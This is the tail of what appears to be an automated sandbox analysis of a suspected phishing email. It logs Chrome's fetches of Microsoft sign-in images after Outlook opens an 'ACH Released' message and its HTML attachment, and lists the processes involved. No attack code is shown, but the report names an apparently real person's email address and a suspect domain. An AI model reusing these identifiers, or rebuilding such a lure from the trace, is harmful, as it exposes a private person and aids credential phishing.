                                                                                                              2024-10-25 20:23:36 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                              Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              42192.168.2.164975613.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:36 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC785INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:36 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 1435
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                              ETag: 0x8DB5C3F4911527F
                                                                                                              x-ms-request-id: 0bad6cc7-301e-0012-60ec-26b886000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202336Z-r197bdfb6b4wmcgqdschtyp7yg00000000zg000000001yze
                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:36 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              43192.168.2.164975713.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:36 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC779INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:36 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 2407
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                              ETag: 0x8DB5C3F499A9B99
                                                                                                              x-ms-request-id: 95332588-d01e-0054-2124-22b3ac000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202336Z-16849878b785dznd7xpawq9gcn00000002ag00000000tszc
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:36 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                                                              Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              44192.168.2.164975813.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:36 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC799INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:36 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 199
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                              ETag: 0x8DB5C3F49C21D98
                                                                                                              x-ms-request-id: 68cfccad-301e-0060-296f-26bfc9000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202336Z-15b8d89586flzzks5bs37v2b90000000058g00000000955f
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache-Info: L1_T2
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:36 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                                                              Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              45192.168.2.164976013.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:36 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC778INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:36 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 673
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                              ETag: 0x8DB5C3F47E260FD
                                                                                                              x-ms-request-id: c9c40271-601e-006d-06aa-26771d000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202336Z-16849878b78qg9mlz11wgn0wcc00000000h000000000fa1p
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:36 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              46192.168.2.1649762185.45.66.1554431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:37 UTC346OUTGET /favicon.ico HTTP/1.1
                                                                                                              Host: marty-n.com
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:37 UTC270INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:37 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 11 Mar 2019 11:56:00 GMT
                                                                                                              ETag: "73b00d6-47e-583d04191d035"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 1150
                                                                                                              Content-Type: image/x-icon
                                                                                                              2024-10-25 20:23:37 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: h(


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              47192.168.2.1649761152.199.21.1754431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:37 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                                                              Host: aadcdn.msftauth.net
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:37 UTC738INHTTP/1.1 200 OK
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Age: 18542989
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Date: Fri, 25 Oct 2024 20:23:37 GMT
                                                                                                              Etag: 0x8DB5C3F4AC59B47
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                                                              Server: ECAcc (lhc/78BB)
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Cache: HIT
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              Content-Length: 1636
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:23:37 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:16:21:32
                                                                                                              Start date:25/10/2024
                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                              Imagebase:0x7ff7981c0000
                                                                                                              File size:71'680 bytes
                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:16:21:41
                                                                                                              Start date:25/10/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\AppData\Local\Temp\Temp1_Rob.Kuster@stonhard.com.zip\Rob.Kuster@stonhard.com (Primary)\Recoverable Items\Purges\ACH Released 10%2F2%2F2024 Ref.msg"
                                                                                                              Imagebase:0xe80000
                                                                                                              File size:34'446'744 bytes
                                                                                                              MD5 hash:91A5292942864110ED734005B7E005C0
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:16:21:45
                                                                                                              Start date:25/10/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "131B3A01-507D-4266-80B2-B5528E4A4C4D" "0CD3F6DC-211C-46EC-89D2-436A5971245B" "7072" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                                                                                                              Imagebase:0x7ff740710000
                                                                                                              File size:710'048 bytes
                                                                                                              MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:16:22:23
                                                                                                              Start date:25/10/2024
                                                                                                              Path:C:\Windows\System32\notepad.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\system32\notepad.exe"
                                                                                                              Imagebase:0x7ff7cda80000
                                                                                                              File size:201'216 bytes
                                                                                                              MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:16
                                                                                                              Start time:16:23:28
                                                                                                              Start date:25/10/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968.htm
                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:17
                                                                                                              Start time:16:23:28
                                                                                                              Start date:25/10/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1844,i,6784266776184120549,4847810179203446940,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              No disassembly